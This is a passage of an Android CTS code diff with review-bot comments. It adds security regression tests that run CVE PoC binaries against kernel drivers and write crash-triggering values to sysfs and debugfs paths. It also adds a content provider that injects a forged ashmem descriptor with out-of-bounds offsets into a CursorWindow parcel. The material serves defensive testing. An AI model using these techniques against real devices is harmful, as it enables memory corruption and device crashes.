- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
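Review bot: The Javadoc on both `runPoc` overloads no longer matches the code: it still says "Pushes and runs a binary" and the new overload documents `@param pathToPoc`, but the bodies push nothing and the parameter is `pocName`, a file name expected to exist already under `/data/local/tmp/`. Reword it along the lines of `Runs a PoC binary that was already pushed to /data/local/tmp` with `@param pocName name of the binary under /data/local/tmp`, and state what the caller sees when the timeout expires. `pocName` is concatenated into a shell command line, so the comment should also say that callers pass a fixed name and never device- or user-derived text. `CollectingOutputReceiver` needs an import that the import hunk does not add; presumably the file already has it.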
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
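Review bot: Every test in this class passes without doing anything when `containsDriver` returns false, and nothing is logged, so a run on a device without `/dev/dri/renderD129` cannot be told apart from a run that exercised the driver. Log the skip in each branch, for example `CLog.i("CVE-2016-6730: /dev/dri/renderD129 not present, skipping");`, so missing coverage is visible in the report. None of the tests asserts on the PoC output either; a class comment such as `// Pass criterion: the device does not reboot while the PoC runs (checked by SecurityTestCase).` would state what a pass means, assuming that is where the check lives. Apart from `SecurityTest`, the imports at the top of the file are unused in the visible code and can be dropped, as Poc17_01.java already does.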
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ @SecurityTest
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
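Review bot: In `testPocCVE_2016_8460`, `assertTrue(!result.equals("Vulnerable"))` fails only on an exact match, so a PoC that prints `Vulnerable` followed by a newline or any other text would still pass; `assertFalse(result.contains("Vulnerable"));` is the safer check (the PoC source is not in this part of the diff, so its exact output should be confirmed). The second line of the licence header carries stray terminal text, `0;256;0c`, which should be removed. `testPocCVE_2016_8451` and `testPoc32659848` write to fixed sysfs and debugfs paths without the presence check the other tests use, and the first of those paths looks specific to one device; a guard plus a comment naming the affected hardware would keep the result meaningful on other devices.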
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
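Review bot: `containsDriver` treats every `ls` result other than the literal text "No such file or directory" as "present", so a permission error, a differently worded message or an empty reply lets the PoC run against a path that may not exist. `ITestDevice` already offers an existence check, and `return mDevice.doesFileExist(driver);` avoids both parsing shell output and building a command line from the argument. The Javadoc should also say that `driver` is an absolute path on the device and that the method checks for a device node or file, not for a loaded kernel module.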
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index ccdba15..8fc3264 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -209,16 +209,8 @@
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
for (String line : output.split("\\n")) {
- final String truncatedLine;
- // Only look for the activity name before the "topActivity" string.
- final int pos = line.indexOf("topActivity");
- if (pos > 0) {
- truncatedLine = line.substring(0, pos);
- } else {
- truncatedLine = line;
- }
- if (truncatedLine.contains(name)) {
- return truncatedLine;
+ if (line.contains(name)) {
+ return line;
}
}
return "";
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index d901926..98d067a 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -21,6 +21,8 @@
# and when built explicitly put it in the data partition
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+LOCAL_JNI_SHARED_LIBRARIES := libnativecursorwindow_jni libnativehelper_compat_libc++
+
LOCAL_JAVA_LIBRARIES := android.test.runner
LOCAL_STATIC_JAVA_LIBRARIES := android-support-v4 \
@@ -46,3 +48,5 @@
LOCAL_COMPATIBILITY_SUITE := cts
include $(BUILD_CTS_PACKAGE)
+
+include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index d4f203e..040eafa 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -219,6 +219,13 @@
</intent-filter>
</activity>
+ <provider
+ android:name="android.content.cts.CursorWindowContentProvider"
+ android:authorities="cursorwindow.provider"
+ android:exported="true"
+ android:process=":providerProcess">
+ </provider>
+
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
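Review bot: `android:exported="true"` on the new provider looks broader than the test needs, and no `android:permission` is set, so any app installed on the device can query `cursorwindow.provider` while this test package is present. The only consumer visible in this commit, ContentProviderCursorWindowTest, is in the same package, and a provider in another process of the same application is reachable without being exported. Unless another package has to reach it, use `android:exported="false"`; otherwise add a comment explaining why the export is required.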
diff --git a/tests/tests/content/jni/Android.mk b/tests/tests/content/jni/Android.mk
new file mode 100644
index 0000000..4737b35
--- /dev/null
+++ b/tests/tests/content/jni/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libnativecursorwindow_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := NativeCursorWindow.c
+
+LOCAL_C_INCLUDES := $(JNI_H_INCLUDE)
+
+LOCAL_SHARED_LIBRARIES := libnativehelper_compat_libc++ liblog
+LOCAL_CXX_STL := libc++_static
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/content/jni/NativeCursorWindow.c b/tests/tests/content/jni/NativeCursorWindow.c
new file mode 100644
index 0000000..a2fb92a
--- /dev/null
+++ b/tests/tests/content/jni/NativeCursorWindow.c
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define LOG_TAG "NativeCursorWindow"
+
+#include <jni.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <linux/ashmem.h>
+#include <utils/Log.h>
+
+struct Header {
+ // Offset of the lowest unused byte in the window.
+ uint32_t freeOffset;
+
+ // Offset of the first row slot chunk.
+ uint32_t firstChunkOffset;
+
+ uint32_t numRows;
+ uint32_t numColumns;
+};
+
+struct RowSlot {
+ uint32_t offset;
+};
+
+#define ROW_SLOT_CHUNK_NUM_ROWS 100
+
+struct RowSlotChunk {
+ struct RowSlot slots[ROW_SLOT_CHUNK_NUM_ROWS];
+ uint32_t nextChunkOffset;
+};
+
+/* Field types. */
+enum {
+ FIELD_TYPE_NULL = 0,
+ FIELD_TYPE_INTEGER = 1,
+ FIELD_TYPE_FLOAT = 2,
+ FIELD_TYPE_STRING = 3,
+ FIELD_TYPE_BLOB = 4,
+};
+
+/* Opaque type that describes a field slot. */
+struct FieldSlot {
+ int32_t type;
+ union {
+ double d;
+ int64_t l;
+ struct {
+ uint32_t offset;
+ uint32_t size;
+ } buffer;
+ } data;
+} __attribute((packed));
+
+JNIEXPORT jint JNICALL
+Java_android_content_cts_CursorWindowContentProvider_makeNativeCursorWindowFd(JNIEnv *env, jclass clazz,
+jint offset, jint size, jboolean isBlob) {
+ int fd = open("/dev/ashmem", O_RDWR);
+ ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow");
+
+ ioctl(fd, ASHMEM_SET_SIZE, 1024);
+
+ void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+ struct Header *header = (struct Header *) data;
+ unsigned rowSlotChunkOffset = sizeof(struct Header);
+ struct RowSlotChunk *rowSlotChunk = (struct RowSlotChunk *)(data + rowSlotChunkOffset);
+ unsigned fieldSlotOffset = rowSlotChunkOffset + sizeof(struct RowSlotChunk);
+ struct FieldSlot *fieldSlot = (struct FieldSlot *) (data + fieldSlotOffset);
+
+ header->numRows = 1;
+ header->numColumns = 1;
+ header->firstChunkOffset = rowSlotChunkOffset;
+
+ rowSlotChunk->slots[0].offset = fieldSlotOffset;
+
+ fieldSlot->type = isBlob ? FIELD_TYPE_BLOB : FIELD_TYPE_STRING;
+ fieldSlot->data.buffer.offset = offset;
+ fieldSlot->data.buffer.size = size;
+
+ munmap(data, 1024);
+
+ return fd;
+
+}
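Review bot: None of the system calls in `makeNativeCursorWindowFd` is checked, so a failed `open` feeds `-1` into `ioctl` and `mmap`, and a failed `mmap` returns `MAP_FAILED`, which is then dereferenced through `header`. Check each step, close the descriptor on failure and return `-1`; the Java side (outside this hunk) would then need to treat a negative value as an error. The file also uses `uint32_t`, `ioctl` and, with the change below, `close` without including `<stdint.h>`, `<sys/ioctl.h>` or `<unistd.h>`, and `data + rowSlotChunkOffset` is arithmetic on `void *`, a GNU extension; casting to `char *` first is portable.

```c
    int fd = open("/dev/ashmem", O_RDWR);
    if (fd < 0) {
        return -1;
    }
    if (ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow") < 0 ||
        ioctl(fd, ASHMEM_SET_SIZE, 1024) < 0) {
        close(fd);
        return -1;
    }

    void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (data == MAP_FAILED) {
        close(fd);
        return -1;
    }
    /* … unchanged: header, row slot chunk and field slot setup, munmap, return fd … */
```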
diff --git a/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
new file mode 100644
index 0000000..004b193
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.database.Cursor;
+import android.database.sqlite.SQLiteException;
+import android.net.Uri;
+import android.test.AndroidTestCase;
+import android.util.Log;
+
+import java.io.IOException;
+
+/**
+ * Test {@link CursorWindowContentProvider} .
+ */
+public class ContentProviderCursorWindowTest extends AndroidTestCase {
+ private static final String TAG = "ContentProviderCursorWindowTest";
+
+ public void testQuery() throws IOException {
+ Cursor cursor = getContext().getContentResolver().query(
+ Uri.parse("content://cursorwindow.provider/hello"),
+ null, null, null, null
+ );
+ try {
+ cursor.moveToFirst();
+
+ int type = cursor.getType(0);
+ if (type != Cursor.FIELD_TYPE_BLOB) {
+ fail("Unexpected type " + type);
+ }
+ byte[] blob = cursor.getBlob(0);
+ Log.i(TAG, "Blob length " + blob.length);
+ fail("getBlob should fail due to invalid offset used in the field slot");
+ } catch (SQLiteException expected) {
+ Log.i(TAG, "Expected exception: " + expected);
+ } finally {
+ cursor.close();
+ }
+ }
+}
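Review bot: `cursor` is dereferenced without a null check in `testQuery`: `ContentResolver.query` can return null when the provider cannot be reached, and then both `cursor.moveToFirst()` and the `cursor.close()` in `finally` throw a NullPointerException that hides the real cause. Add `assertNotNull("query returned no cursor", cursor);` before the `try`. The result of `moveToFirst()` is ignored as well; `assertTrue(cursor.moveToFirst());` would turn an empty window into a clear failure instead of a misleading type error.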
diff --git a/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
new file mode 100644
index 0000000..4266f35
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.annotation.NonNull;
+import android.annotation.Nullable;
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.AbstractWindowedCursor;
+import android.database.Cursor;
+import android.database.CursorWindow;
+import android.net.Uri;
+import android.os.Parcel;
+import android.os.ParcelFileDescriptor;
+import android.util.Log;
+
+/**
+ * Content provider that uses a custom {@link CursorWindow} to inject file descriptor
+ * pointing to another ashmem region having window slots with references outside of allowed ranges.
+ *
+ * <p>Used in {@link ContentProviderCursorWindowTest}
+ */
+public class CursorWindowContentProvider extends ContentProvider {
+ private static final String TAG = "CursorWindowContentProvider";
+ static {
+ System.loadLibrary("nativecursorwindow_jni");
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection,
+ String[] selectionArgs, String sortOrder) {
+ AbstractWindowedCursor cursor = new AbstractWindowedCursor() {
+ @Override
+ public int getCount() {
+ return 1;
+ }
+
+ @Override
+ public String[] getColumnNames() {
+ return new String[] {"a"};
+ }
+ };
+ cursor.setWindow(new InjectingCursorWindow("TmpWindow"));
+ return cursor;
+ }
+
+ class InjectingCursorWindow extends CursorWindow {
+ InjectingCursorWindow(String name) {
+ super(name);
+ }
+
+ @Override
+ public void writeToParcel(Parcel dest, int flags) {
+ Parcel tmp = Parcel.obtain();
+
+ super.writeToParcel(tmp, flags);
+ tmp.setDataPosition(0);
+ // Find location of file descriptor
+ int fdPos = -1;
+ while (tmp.dataAvail() > 0) {
+ fdPos = tmp.dataPosition();
+ int frameworkFdMarker = tmp.readInt();
+ if (frameworkFdMarker == 0x66642a85 /* BINDER_TYPE_FD */) {
+ break;
+ }
+ }
+ if (fdPos == -1) {
+ tmp.recycle();
+ throw new IllegalStateException("File descriptor not found in the output of "
+ + "CursorWindow.writeToParcel");
+ }
+ // Write reply with replaced file descriptor
+ ParcelFileDescriptor evilFd = ParcelFileDescriptor
+ .adoptFd(makeNativeCursorWindowFd(1000, 1000, true));
+ dest.appendFrom(tmp, 0, fdPos);
+ dest.writeFileDescriptor(evilFd.getFileDescriptor());
+ tmp.setDataPosition(dest.dataPosition());
+ dest.appendFrom(tmp, dest.dataPosition(), tmp.dataAvail());
+ tmp.recycle();
+ }
+ }
+
+ private native static int makeNativeCursorWindowFd(int offset, int size, boolean isBlob);
+
+ // Stubs
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ Log.e(TAG, "delete() not implemented");
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ Log.e(TAG, "getType() not implemented");
+ return "";
+ }
+
+ @Override
+ public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
+ Log.e(TAG, "insert() not implemented");
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection,
+ String[] selectionArgs) {
+ Log.e(TAG, "update() not implemented");
+ return 0;
+ }
+
+}
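Review bot: The `fdPos == -1` guard in `InjectingCursorWindow.writeToParcel` cannot fire once the scan loop has run at least once, because `fdPos` is overwritten with the current position on every iteration whether or not the marker matched. If `BINDER_TYPE_FD` is never found, `fdPos` ends at the last word read and the replacement descriptor is spliced in there instead of the `IllegalStateException` being thrown. Record the position only on a match: `int pos = tmp.dataPosition();` followed by `if (tmp.readInt() == 0x66642a85) { fdPos = pos; break; }`. Separately, `evilFd` is never closed after `dest.writeFileDescriptor(...)`; assuming the parcel keeps its own duplicate, closing it in a `finally` next to `tmp.recycle()` would avoid leaking the adopted descriptor in the provider process.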
diff --git a/tests/tests/location/src/android/location/cts/LocationManagerTest.java b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
index 7fcc2aa..3af213e 100644
--- a/tests/tests/location/src/android/location/cts/LocationManagerTest.java
+++ b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
@@ -993,6 +993,27 @@
}
}
+ /**
